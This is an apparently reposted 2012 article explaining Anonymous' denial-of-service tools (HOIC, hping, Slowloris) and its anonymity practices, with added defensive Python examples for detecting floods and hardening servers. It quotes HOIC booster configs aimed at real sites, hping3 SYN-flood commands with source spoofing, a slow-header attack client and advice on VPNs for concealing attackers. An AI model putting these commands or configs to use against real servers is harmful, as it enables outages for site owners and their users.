Sunday, 3 June 2012

High Orbits and Slowlorises: understanding the Anonymous attack tools



Anonymous' HOIC denial-of-service attack tool
Most members of Anonymous would prefer to stay, well, anonymous. But as the group has engaged in increasingly high-profile attacks on government and corporate websites, doing so effectively and staying out of harm's way have become an ever-growing challenge. To protect itself, the group has altered its tactics over the past year to both increase the firepower of its attacks and shield members from the prying eyes of law enforcement.
In late 2011, members of Anonymous began to step away from their most well-known weapon for distributed denial of service attacks. While some in the group continued to try to get enthusiastic followers (or unwary webpage visitors) to use a Web browser version of the Low Orbit Ion Cannon attack tool, use of LOIC had led to the arrests of members of Anonymous and LulzSec last summer. More cautious and technically skilled Anons started to use a collection of other tools and security practices to both step up attacks and hide themselves from being tracked. A message spread through Anonymous’ IRC channels spells it out: “Do NOT use LOIC.”

How Denial of Service attacks work

Denial-of-service (DoS) attacks aim to keep legitimate users from reaching a website or other Internet service. They usually do this either by overwhelming one or more resources of the server that hosts the website or application with traffic, or by disrupting a network service that the server depends on.
The most common are "flood" brute-force attacks, which send a huge volume of packets or requests to saturate the bandwidth of the server's network connection, or to exhaust the per-connection state the server keeps (TCP connection tables, application worker slots), so that it can no longer accept new connections. Other attacks go after the applications themselves, using specially formed requests that trigger a flaw or an expensive code path in the server software to crash it or make it stop responding.
A distributed denial of service (DDoS) attack spreads the malicious requests to the server across many source computers—often by using a "botnet" controlling hundreds of infected computers, or in the case of Anonymous, by coordinating the efforts of tens or hundreds of volunteer "activists" to launch attacks.
The attacks on the websites of the Justice Department and others in the wake of the takedown of Megaupload.com were the first demonstration of the power of LOIC’s successor—a DDoS tool called the High Orbit Ion Cannon.
HOIC isn't exactly rocket science. At its core, it is essentially a simple script for launching HTTP POST and GET requests at a targeted server, wrapped in a "lulz" friendly graphical interface. According to the documentation, it can be used to open up 256 attack sessions simultaneously—either targeting a single server, or going after multiple targets. The user can control the number of threads used per attack.


This rocket needs boosters

The code itself isn't that sophisticated. HOIC is written in Basic; more precisely, in Real Software's REALbasic, the cross-platform dialect of the language originally developed for the Mac. The main power of HOIC is that it can be customized for each attack target relatively easily without knowing how to code, using "boosters": script files containing additional Basic-like code that HOIC parses at runtime.
HOIC's boosters tailor the HTTP requests sent by HOIC to the target for a specific type of attack. "HOIC is pretty useless," the documentation file that comes with the code says, "unless it is used in combination with 'Boosters.'" And that's putting it mildly: the attack requests are generated entirely from what's in the booster file. When an attack is launched, HOIC parses the booster to build the list of HTTP headers to be sent and to set the mode of the attack (GET or POST).
One approach commonly used in boosters is to create randomized requests in an attempt to defeat any content delivery network (CDN) or caching used to shield the server from traffic spikes. Some boosters use lists of URLs within a target site, appending them to a table in memory to be used by the attack thread:
// populate rotating urls
randURLs.Append "http://www.om.nl/"
randURLs.Append "http://www.om.nl/onderwerpen/cybercrime/"
The script also can include a randomized list of user agents, referring sites and random headers that are fed into HTTP requests to make the requests look more legitimate:
useragents.Append " Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
useragents.Append " Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
referers.Append " http://www.google.com/?q=" +URL
The booster script can also include parameters to set the volume of the attack, and to switch between GET and POST requests. For example, here’s the booster set up to attack a dynamic part of Visa’s webpage, using POST, complete with a form submission to the target page:
UsePost = true
Headers.Append(" User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Firefox/3.6.12" )
Headers.Append(" Keep-Alive: 115")
Headers.Append("Proxy-Connection: keep-alive")

Headers.Append(" Referer: http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do")

Headers.Append(" Cookie: JSESSIONID=5D2E604F487FB5AC9DBF9A1FDEA7D86A.fta-web3" )

URL = "http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do"

PostBuffer = "newSearch=true&airport=&pageid=adv&filteredNameSubmit=false&LOC=en_US&country=CHE&street1=2353464756867867876886786777777777777777777777777777786&building=&city=aaaaaaaaaaaaaaa&initialSearchName=&mapAndList=mapAndList&x=27&y=9"
While the scripts themselves can get fairly sophisticated in how they're configured, a generic booster file distributed with HOIC makes it fairly simple for would-be DDoSers to build a custom booster for whatever target has earned their ire that day and distribute it via a shared document site like PasteBin, Google Documents, or an Etherpad site. For example, when a hungry Anon got upset about a late pizza delivery on Valentine's Day, he quickly shared a list of Web addresses to start an impromptu DDoS on Pizza Hut.
The actual code that runs the attacks is executed as threads by a set of timers. ObjTarget.SendAttack is pretty straightforward (note that the byte counter it keeps is only an approximation: header lengths plus the verb, with no allowance for the request line, line terminators, or the rest of the HTTP framing):
  ' Creating the socket request
  Dim httpObj as HTTPSocket
  Dim i as integer
  Dim reqSize as integer = 0
  httpObj = New HTTPSocket

  ' Adding the headers generated by the booster: each line is split at its
  ' first colon into a header name and a header value
  for i = 0 to Headers.Ubound
    reqSize = reqSize + Headers(i).Len
    httpObj.SetRequestHeader(Headers(i).Left(Headers(i).InStr(":")-1), Headers(i).Mid(Headers(i).InStr(":")+1, Headers(i).Len - Headers(i).InStr(":")))
  Next

  ' For attacks where POST has been chosen as the type of HTTP request
  if(UsePost) then
    reqSize = reqSize + PostBuffer.Len + 4 ' POST
    httpObj.SetPostContent(PostBuffer, "application/x-www-form-urlencoded")
    httpObj.Post URL
  ' For GET based attacks
  else
    reqSize = reqSize + 3 ' GET
    httpObj.Get URL
  end if

  ' Tracking how much data has been sent to the target
  TotalBytesSent = TotalBytesSent + reqSize
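Seen from the target, the booster fragments and the SendAttack loop above add up to a recognisable shape: a tight loop of requests from one address, a handful of User-Agent strings rotated per request, and a Referer built as "http://www.google.com/?q=" + URL, which puts the target's own address where a real Google referer would carry search terms. The following Python script is an added example for this page, not code from the article or from HOIC: it scans Apache "combined" access log lines for those three signals and reports the offending source addresses. The log lines, IP addresses, hostnames and thresholds in it are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Added example, not from the article or from HOIC: flag HOIC-booster-style
# floods in Apache "combined" access logs. Addresses, log lines and the
# thresholds are constructed for illustration; tune them to your own traffic.

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')
# The booster builds Referer as "http://www.google.com/?q=" + URL: the
# target's own URL as the query, a pattern a real Google referer never has.
BOGUS_REF = re.compile(r"^https?://www\.google\.com/\?q=https?://")


def parse_line(line):
    """Combined-log line -> dict with a parsed timestamp, or None on mismatch."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def flag_sources(lines, window_s=10, max_rate=5.0, max_uas=3):
    """Return {ip: [reasons]} for clients whose traffic looks like a booster:
    too many requests in any window_s-second window, more than max_uas
    different User-Agents from one address, or the fake Google Referer."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    flagged = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        reasons = []
        peak, j = 0, 0                          # most requests in any window_s seconds
        for i, rec in enumerate(recs):
            while (rec["ts"] - recs[j]["ts"]).total_seconds() > window_s:
                j += 1
            peak = max(peak, i - j + 1)
        if peak / window_s > max_rate:
            reasons.append(f"{peak} requests in {window_s}s")
        uas = {r["ua"] for r in recs}
        if len(uas) > max_uas:
            reasons.append(f"{len(uas)} different User-Agents from one address")
        if any(BOGUS_REF.match(r["ref"]) for r in recs):
            reasons.append("booster-style Referer google.com/?q=<target URL>")
        if reasons:
            flagged[ip] = reasons
    return flagged


# --- constructed sample log: one HOIC-like source and one ordinary visitor ---
UAS = [
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Firefox/3.6.12",
    "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
]
PATHS = ["/", "/onderwerpen/cybercrime/", "/contact/"]


def log_line(ip, ts, path, ref, ua):
    return (f'{ip} - - [{ts.strftime("%d/%b/%Y:%H:%M:%S %z")}] "GET {path} HTTP/1.1" '
            f'200 512 "{ref}" "{ua}"')


def sample_log():
    t0 = datetime(2012, 6, 3, 12, 0, 0, tzinfo=timezone.utc)
    lines = []
    for n in range(80):                         # 80 hits in 8 s, rotating URL/UA, fake referer
        path = PATHS[n % len(PATHS)]
        lines.append(log_line("203.0.113.7", t0 + timedelta(milliseconds=100 * n), path,
                              "http://www.google.com/?q=http://www.example.org" + path,
                              UAS[n % len(UAS)]))
    for n in range(5):                          # a person: five pages in a minute, one browser
        lines.append(log_line("198.51.100.20", t0 + timedelta(seconds=12 * n),
                              PATHS[n % len(PATHS)], "http://www.example.org/", UAS[0]))
    return lines


if __name__ == "__main__":
    for ip, why in flag_sources(sample_log()).items():
        print(ip, "->", "; ".join(why))
```

The rate check alone catches any flood; the User-Agent and Referer checks are what separate a HOIC booster from a busy but honest client (or a CDN edge), so in practice you would alert on the rate and use the other two to decide whether to block.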
But HOIC isn’t the only tool that Anons are promoting.

The old(er) bag of tricks

Despite its improved attacks, HOIC still points an arrow straight back at the source of the DDoS. And some of the targets Anonymous’ various #Ops are going after aren’t suitable for straight-up HTTP attacks. So there are two other tools that have been tossed into Anon’s #Setup recommendations that aren’t exactly new to the security world: Hping and Slowloris, a pair of network security testing tools that also have the potential to be used for evil.
Hping is a TCP/IP "packet assembler and analyzer" initially developed and still maintained by Salvatore Sanfilippo, a Sicilian programmer. It uses a command-line interface similar to that of the ping utility, but it can do a lot more than send ICMP echo requests. It can throw a high volume of crafted TCP SYN packets at a target (-S sets the SYN flag; -i u100 sends one every 100 microseconds) while hiding the real source by forging the source address, as Anonymous' tutorial shows:
### Normal hping DoS attack:
hping3 -S -i u100 riaa.org
### Spoofed random source address attack:
hping3 -S -i u100 riaa.org --rand-source
### Reflected attack(it looks like mpaa.org is DoS'ing riaa.org)
hping3 -S -i u100 riaa.org -a mpaa.org
Two things about these lines are worth knowing. None of them sets a destination port, so hping3 uses its default of port 0 unless -p is added. And the "reflected" variant is plain source spoofing: riaa.org answers each forged SYN with a SYN-ACK addressed to mpaa.org, so the decoy is hit with backscatter while the real sender never sees a reply, which is also why the spoofed variants are useless for anything that needs a completed handshake.
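What the three invocations look like on the wire, from the target's and the decoy's point of view, is easier to see with a small analysis script. The following Python is an added example for this page, not code from the article or from hping: it summarises a list of TCP packets (timestamp, source, destination, flags) into the signals a SYN flood leaves behind, namely the peak inbound SYN rate, the share of SYN sources that never complete the handshake, and unsolicited SYN-ACKs, which are what the spoofed party in the -a case receives. The packets, addresses and threshold are constructed for illustration.

```python
from collections import Counter, namedtuple

# Added example, not from the article or from hping: what each hping3 variant
# above looks like on the wire and how to tell them apart from packet metadata.
# Packets, addresses and the flood threshold are constructed for illustration.

Packet = namedtuple("Packet", "ts src dst flags")      # flags: "S", "SA", "A", "R"


def analyze(packets, my_ip, window_s=1.0, flood_rate=200):
    """Summarise TCP handshake traffic as seen by my_ip.

    peak_syn_rate       inbound SYNs per second in the busiest window
    syn_sources         distinct addresses that sent us a SYN
    half_open_fraction  share of those sources that never sent the final ACK
    backscatter_from    hosts sending us SYN-ACKs for connections we never
                        opened, i.e. someone is spoofing my_ip (hping3 -a)
    """
    syns = sorted((p.ts, p.src) for p in packets if p.dst == my_ip and p.flags == "S")
    acked = {p.src for p in packets if p.dst == my_ip and p.flags == "A"}
    sources = {src for _, src in syns}

    peak, j = 0, 0                                  # sliding-window maximum of SYNs
    for i, (ts, _) in enumerate(syns):
        while ts - syns[j][0] > window_s:
            j += 1
        peak = max(peak, i - j + 1)

    we_contacted = {p.dst for p in packets if p.src == my_ip and p.flags == "S"}
    backscatter = Counter(p.src for p in packets
                          if p.dst == my_ip and p.flags == "SA" and p.src not in we_contacted)
    return {
        "peak_syn_rate": peak / window_s,
        "syn_flood": peak / window_s > flood_rate,
        "syn_sources": len(sources),
        "half_open_fraction": len(sources - acked) / len(sources) if sources else 0.0,
        "backscatter_from": dict(backscatter),
    }


TARGET, ATTACKER, DECOY = "198.51.100.10", "192.0.2.5", "203.0.113.9"   # constructed


def hping_plain(n=500):
    """hping3 -S -i u100 TARGET: a SYN every 100 us from the real source, never ACKed."""
    return [Packet(i * 1e-4, ATTACKER, TARGET, "S") for i in range(n)]


def hping_rand_source(n=500):
    """--rand-source: every SYN carries a different forged source address."""
    return [Packet(i * 1e-4, f"10.0.{i >> 8}.{i & 255}", TARGET, "S") for i in range(n)]


def hping_spoofed_as_decoy(n=500):
    """-a DECOY, from the decoy's point of view: TARGET's SYN-ACK replies arrive
    for connections the decoy never opened; the real sender sees nothing."""
    return [Packet(i * 1e-4, TARGET, DECOY, "SA") for i in range(n)]


def legit_client(src="198.51.100.77"):
    """One ordinary three-way handshake, for comparison."""
    return [Packet(0.0, src, TARGET, "S"), Packet(0.01, TARGET, src, "SA"),
            Packet(0.02, src, TARGET, "A")]


if __name__ == "__main__":
    print("plain flood  :", analyze(hping_plain() + legit_client(), TARGET))
    print("random source:", analyze(hping_rand_source(), TARGET))
    print("decoy's view :", analyze(hping_spoofed_as_decoy(), DECOY))
```

The plain flood shows a high SYN rate from a single source that can simply be dropped; --rand-source shows the same rate spread over hundreds of sources, which is what SYN cookies and per-source limits on the target are for; and the decoy sees no SYNs at all, only SYN-ACKs it never asked for, which is how mpaa.org would learn it is being used as a decoy rather than being attacked directly.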
Slowloris is a different sort of attack entirely: a slow HTTP attack that sends partial HTTP requests to a server and then dribbles out further header lines a few bytes at a time, so the server keeps each connection open waiting for the rest of the request. Every such connection occupies one of the server's worker threads or processes, so a few hundred of them can exhaust the connection slots of Apache (its MaxClients limit) and of other servers that dedicate a worker to each connection, while event-driven servers such as nginx are largely unaffected. The attack works best against low-traffic sites, and it's ideal where there's doubt that enough bandwidth is available for a brute-force DDoS to succeed, or where there's concern about collateral damage to other users on the same network. That's why Slowloris was used against Iranian servers during the protests around the Iranian elections in 2009.
But Slowloris is not a tool for the masses. It requires Perl, and runs best on Linux. The author of Slowloris, known as RSnake, said that Windows users “will not be able to successfully execute a Slowloris denial of service from Windows…because Slowloris requires more than a few hundred sockets to work (sometimes a thousand or more), and Windows limits sockets to around 130, from what I've seen.”
However, a Python-based version of the exploit, PyLoris, gets around those limitations. It has a graphical interface, and can be used effectively from Windows; Christopher Gilbert, the developer of PyLoris, claims he’s tested PyLoris on Windows with "over 6000 connections, and [doesn’t] see why it couldn’t use more than that."
PyLoris also includes a feature called TOR Switcher, which allows attacks to be carried out over the Tor anonymity network and switches between Tor "identities," changing the apparent origin of the attack at user-defined intervals.

A screenshot of PyLoris in action
Used individually, these tools can be somewhat effective in slowing down many of the sites that Anonymous targets. But as Curt Wilson, a researcher with Arbor Networks’ Security Engineering and Response Team, said to Ars in an interview, "If you use volumetric floods on top of specific application attacks [like Slowloris], it’s a pretty powerful combination."
And just by the sheer number of attacking systems that Anonymous can bring aboard to launch these attacks when its members and friends are highly motivated—as in the wake of the Megaupload shutdown—even the most basic of tools can cause problems for large websites.
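The slow-header mechanism described above, and the defence against it, fit in a few dozen lines. The following Python is an added example for this page, not code from the article, Slowloris or PyLoris: a tiny HTTP server with a fixed pool of workers stands in for Apache's MaxClients, a "loris" client parks one never-finishing request on every worker, and a normal client then tries to get served. The one knob is a deadline for receiving the complete header block; with no deadline the normal client is starved, with a deadline the slow connections are dropped and it gets through. Everything runs on the loopback interface; the pool size, timings and request strings are chosen for the demonstration.

```python
import socket
import threading
import time

# Added example, not from the article, Slowloris or PyLoris. A bounded worker
# pool models Apache's MaxClients; `header_deadline` is the defence (the whole
# header block must arrive within that many seconds, None = no limit, which is
# the Slowloris-vulnerable behaviour). Pool size and timings are illustrative.

RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\nConnection: close\r\n\r\nok"


def serve(listener, workers, header_deadline, stop):
    """Accept connections, handing each one to a worker from a bounded pool."""
    slots = threading.Semaphore(workers)

    def handle(conn):
        try:
            conn.settimeout(0.1)
            started, buf = time.monotonic(), b""
            while b"\r\n\r\n" not in buf:            # wait for the end of the headers
                if header_deadline is not None and time.monotonic() - started > header_deadline:
                    return                            # hardened: stop waiting for a dribbling client
                try:
                    chunk = conn.recv(1024)
                except socket.timeout:
                    continue                          # vulnerable: a silent worker just keeps waiting
                if not chunk:
                    return
                buf += chunk
            conn.sendall(RESPONSE)
        except OSError:
            pass
        finally:
            conn.close()
            slots.release()

    listener.settimeout(0.2)                          # poll so the loop can notice `stop`
    while not stop.is_set():
        slots.acquire()                               # blocks here once every worker is busy
        try:
            conn, _ = listener.accept()
        except socket.timeout:
            slots.release()
            continue
        except OSError:                               # listener closed: shut down
            slots.release()
            break
        threading.Thread(target=handle, args=(conn,), daemon=True).start()


def slow_request(addr, stop, interval=0.1):
    """Slowloris: send a partial request, then keep adding header lines slowly
    so the server never sees the blank line that ends the header block."""
    s = socket.create_connection(addr)
    try:
        s.sendall(b"GET / HTTP/1.1\r\nHost: target\r\n")
        while not stop.is_set():
            time.sleep(interval)
            s.sendall(b"X-a: b\r\n")
    except OSError:
        pass                                          # the server hung up on us
    finally:
        s.close()


def normal_request(addr, timeout):
    """A well-behaved client; True if it gets a 200 within `timeout` seconds."""
    s = socket.create_connection(addr)
    s.settimeout(timeout)
    try:
        s.sendall(b"GET / HTTP/1.1\r\nHost: target\r\n\r\n")
        return s.recv(64).startswith(b"HTTP/1.1 200")
    except OSError:
        return False
    finally:
        s.close()


def run_scenario(header_deadline, workers=2, attackers=2):
    """True if a normal client is served while `attackers` loris connections
    are parked on a server with `workers` slots."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(16)
    addr, stop = listener.getsockname(), threading.Event()
    threading.Thread(target=serve, args=(listener, workers, header_deadline, stop),
                     daemon=True).start()
    lorises = [threading.Thread(target=slow_request, args=(addr, stop), daemon=True)
               for _ in range(attackers)]
    for t in lorises:
        t.start()
    time.sleep(0.3)                                   # let the attackers take every slot
    served = normal_request(addr, timeout=2.0)
    stop.set()
    listener.close()
    for t in lorises:
        t.join(1.0)
    return served


if __name__ == "__main__":
    print("no header deadline  -> normal client served:", run_scenario(None))
    print("header deadline 0.5 -> normal client served:", run_scenario(0.5))
```

The deadline is the same idea Apache's mod_reqtimeout implements with its RequestReadTimeout directive (a time budget and a minimum data rate for the header and body phases); the point of the toy is that a per-read timeout alone is not enough, because Slowloris sends just enough every few seconds to reset it, so the budget has to cover the whole request.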

Covering the trail

There is still the matter of being able to pull off these large attacks with volunteered computers and keeping those volunteers anonymous. While Hping can provide some obscuring of the source of an attack, the other tools point straight back at their source. So Anons have been eager to find ways to keep their IP addresses concealed.
The problem is that freely available anonymizing networks generally aren't up to the task of handling the bandwidth of DoS attacks. Attempting to launch HOIC or other DDoS tools over Tor would amount to an attack on that network itself, and on the Anonymous members who use it to protect themselves. So with the exception of Slowloris and PyLoris attacks, which demand relatively little bandwidth, the Anonymous edict is "DO NOT DOS THROUGH TOR."
Some Anons have turned to a variety of proxy tools—including a fairly suspicious commercial software package called AutoHideIP, which claims to anonymize users by connecting them through proxies for a one-time fee, even selecting the country from which their IP address appears to be located. Efforts by Ars to contact the creators of AutoHideIP, Coolware Max, were unsuccessful.
But there’s reason to be suspicious of the security of proxy services, and of other anonymizing services such as VPNs, because they could be compelled by law enforcement to turn over traffic logs. That was the case in the arrest of one alleged LulzSec member, who was apprehended after VPN provider HideMyAss.com turned over log data that helped trace him to Arizona.
For that reason, Anonymous’ best-practice advice for members is to stick to Anonine and VPNTunnel, two paid VPN-based anonymizing services based in Sweden—where privacy laws don’t require providers to keep access logs (and in some cases prohibit it).
Both of the services are based on OpenVPN, the GPL-licensed open source virtual private network software available on Windows, Mac OS X and Linux. However, as Anonine has expanded service beyond Sweden, with servers available worldwide, some of its servers have started to keep logs in accordance with local laws, so Anonymous' members are warned to specifically configure their clients for Swedish servers.
It's doubtful that everyone in Anonymous plays by these rules. And that's probably a good thing for Anonymous, because it would pose a strategic problem—all that authorities would need to do to deflect Anonymous' attacks is to refuse connections from the blocks of IP addresses assigned to these two Swedish providers. And with the European Union considering new EU-wide regulations that would standardize privacy rules across the continent, it's not certain how much longer Sweden will be a safe haven.
